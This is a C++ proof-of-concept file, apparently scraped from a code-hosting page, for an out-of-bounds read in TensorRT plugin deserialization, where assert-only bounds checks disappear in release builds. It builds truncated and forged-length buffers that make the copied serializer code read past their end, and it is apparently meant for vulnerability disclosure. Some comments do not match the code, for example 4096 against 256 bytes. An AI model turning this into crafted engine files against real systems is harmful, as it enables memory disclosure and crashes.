File size: 10,284 Bytes
e00c466
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
/*
 * PoC: Out-of-bounds heap read in TensorRT plugin deserialization
 *
 * Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
 * which is compiled out in release builds (NDEBUG defined). The read<T>()
 * function in plugin.h has ZERO bounds checking. When a malicious TensorRT
 * engine file (.trt/.engine/.plan) contains a plugin with truncated or
 * crafted serialization data, the deserialization reads past the buffer
 * boundary.
 *
 * This PoC demonstrates two bugs:
 *
 * 1. serialize.hpp vector deserialization (line 101-112):
 *    - Reads attacker-controlled `size` from buffer
 *    - Resizes vector to `size`
 *    - Computes nbyte = size * sizeof(T) (can overflow)
 *    - assert(*buffer_size >= nbyte) β€” NO-OP in release
 *    - memcpy from buffer with no bounds check
 *
 * 2. serialize.hpp string deserialization (line 128-138):
 *    - Reads attacker-controlled `nbyte` from buffer
 *    - Resizes string to nbyte
 *    - assert(*buffer_size >= nbyte) β€” NO-OP in release
 *    - memcpy from buffer with no bounds check
 *
 * Affected code:
 *   - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
 *   - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
 *   - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
 *   - TensorRT/plugin/common/plugin.h:100-108 (read<T>() β€” zero checks)
 *
 * All 30+ TensorRT plugins that use these primitives are affected.
 *
 * Build and run:
 *   # Debug (assert enabled β€” catches the bug):
 *   g++ -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
 *   ./poc_debug
 *
 *   # Release (assert disabled β€” ASAN catches OOB read):
 *   g++ -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
 *   ./poc_release
 */

#include <cassert>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>

// ============================================================================
// Copied verbatim from TensorRT/plugin/common/serialize.hpp
// ============================================================================

template <typename T>
inline void serialize_value(void** buffer, T const& value);

template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);

namespace
{

template <typename T, class Enable = void>
struct Serializer
{
};

// POD serializer β€” assert-only bounds check
template <typename T>
struct Serializer<T, typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    static size_t serialized_size(T const&)
    {
        return sizeof(T);
    }
    static void serialize(void** buffer, T const& value)
    {
        ::memcpy(*buffer, &value, sizeof(T));
        reinterpret_cast<char*&>(*buffer) += sizeof(T);
    }
    static void deserialize(void const** buffer, size_t* buffer_size, T* value)
    {
        assert(*buffer_size >= sizeof(T));  // NO-OP when NDEBUG is defined!
        ::memcpy(value, *buffer, sizeof(T));
        reinterpret_cast<char const*&>(*buffer) += sizeof(T);
        *buffer_size -= sizeof(T);
    }
};

// Vector serializer β€” assert-only bounds check + potential integer overflow
template <typename T>
struct Serializer<std::vector<T>,
    typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    static size_t serialized_size(std::vector<T> const& value)
    {
        return sizeof(value.size()) + value.size() * sizeof(T);
    }
    static void serialize(void** buffer, std::vector<T> const& value)
    {
        serialize_value(buffer, value.size());
        size_t nbyte = value.size() * sizeof(T);
        ::memcpy(*buffer, value.data(), nbyte);
        reinterpret_cast<char*&>(*buffer) += nbyte;
    }
    static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
    {
        size_t size;
        deserialize_value(buffer, buffer_size, &size);
        value->resize(size);
        size_t nbyte = value->size() * sizeof(T);
        assert(*buffer_size >= nbyte);  // NO-OP when NDEBUG is defined!
        ::memcpy(value->data(), *buffer, nbyte);
        reinterpret_cast<char const*&>(*buffer) += nbyte;
        *buffer_size -= nbyte;
    }
};

// String serializer β€” assert-only bounds check
template <>
struct Serializer<std::string>
{
    static size_t serialized_size(std::string const& value)
    {
        return sizeof(value.size()) + value.size();
    }
    static void serialize(void** buffer, std::string const& value)
    {
        size_t nbyte = value.size();
        serialize_value(buffer, nbyte);
        ::memcpy(*buffer, value.data(), nbyte);
        reinterpret_cast<char*&>(*buffer) += nbyte;
    }
    static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
    {
        size_t nbyte;
        deserialize_value(buffer, buffer_size, &nbyte);
        value->resize(nbyte);
        assert(value->size() == nbyte);
        assert(*buffer_size >= nbyte);  // NO-OP when NDEBUG is defined!
        ::memcpy(const_cast<char*>(value->data()), *buffer, nbyte);
        reinterpret_cast<char const*&>(*buffer) += nbyte;
        *buffer_size -= nbyte;
    }
};

} // namespace

template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
    Serializer<T>::serialize(buffer, value);
}

template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
    Serializer<T>::deserialize(buffer, buffer_size, value);
}

// ============================================================================
// Copied verbatim from TensorRT/plugin/common/plugin.h
// ============================================================================

template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
    static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
    OutType val{};
    std::memcpy(&val, static_cast<void const*>(buffer), sizeof(OutType));
    buffer += sizeof(OutType);
    return val;
}

// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================

// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// with a truncated/malicious buffer
void poc_read_oob()
{
    std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
    std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;

    // Create a tiny buffer (only 16 bytes) but pretend it's a full plugin serialization
    // A real FlattenConcat expects: bool + int32 + int32 + int32 + (mNumInputs * int32) + ...
    // We provide only 16 bytes, but set mNumInputs to 1000
    char buffer[16];
    memset(buffer, 0x41, sizeof(buffer));  // Fill with 'A' for visibility

    // Write mIgnoreBatch (bool), mConcatAxisID (int32=1), mOutputConcatAxis (int32),
    // then mNumInputs = 1000 (attacker-controlled)
    char* wp = buffer;
    *reinterpret_cast<bool*>(wp) = false; wp += sizeof(bool);
    *reinterpret_cast<int32_t*>(wp) = 1; wp += sizeof(int32_t);    // mConcatAxisID
    *reinterpret_cast<int32_t*>(wp) = 0; wp += sizeof(int32_t);    // mOutputConcatAxis
    // Remaining 3 bytes not enough for mNumInputs β€” read<int32_t> will read OOB

    char const* d = buffer;
    // These reads will go past the 16-byte buffer:
    bool ignoreBatch = read<bool>(d);
    int32_t concatAxisID = read<int32_t>(d);
    int32_t outputConcatAxis = read<int32_t>(d);
    int32_t numInputs = read<int32_t>(d);  // reads last 4 bytes β€” still in bounds barely

    std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
              << " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;

    // This read goes PAST the buffer β€” OOB read!
    std::cout << "Next read goes OOB..." << std::endl;
    int32_t oob_value = read<int32_t>(d);  // <-- HEAP BUFFER OVERFLOW READ
    std::cout << "OOB read value: " << oob_value << std::endl;
}

// Demonstrates the string deserialization with crafted length
void poc_string_deserialize_oob()
{
    std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;

    // Create a buffer with: size_t length = 4096, but only 8 bytes of actual string data
    // In release builds (NDEBUG), the assert is removed and memcpy reads 4096 bytes
    // from a buffer that only has 8 bytes remaining
    const size_t fake_length = 256;  // claim string is 256 bytes
    const size_t actual_data = 8;     // but only provide 8 bytes after the length field

    size_t total_buf_size = sizeof(size_t) + actual_data;
    char* buffer = new char[total_buf_size];
    memcpy(buffer, &fake_length, sizeof(size_t));           // write the fake length
    memset(buffer + sizeof(size_t), 'B', actual_data);      // write 8 bytes of data

    void const* ptr = buffer;
    size_t remaining = total_buf_size;

    std::string result;

#ifdef NDEBUG
    std::cout << "NDEBUG defined β€” assert() is disabled, OOB read will occur" << std::endl;
#else
    std::cout << "NDEBUG not defined β€” assert() will catch the bug (this is expected in debug)" << std::endl;
    std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif

    // This will:
    // 1. Read size_t fake_length (256) from buffer
    // 2. Resize string to 256
    // 3. assert(remaining >= 256) β€” NO-OP in release!
    // 4. memcpy 256 bytes from buffer that only has 8 bytes β€” OOB READ
    deserialize_value(&ptr, &remaining, &result);

    std::cout << "String length: " << result.size() << std::endl;
    std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;

    delete[] buffer;
}

int main()
{
    std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
    std::cout << "====================================" << std::endl;

#ifdef NDEBUG
    std::cout << "Build mode: RELEASE (NDEBUG defined β€” assert() disabled)" << std::endl;
#else
    std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif

    poc_read_oob();
    poc_string_deserialize_oob();

    return 0;
}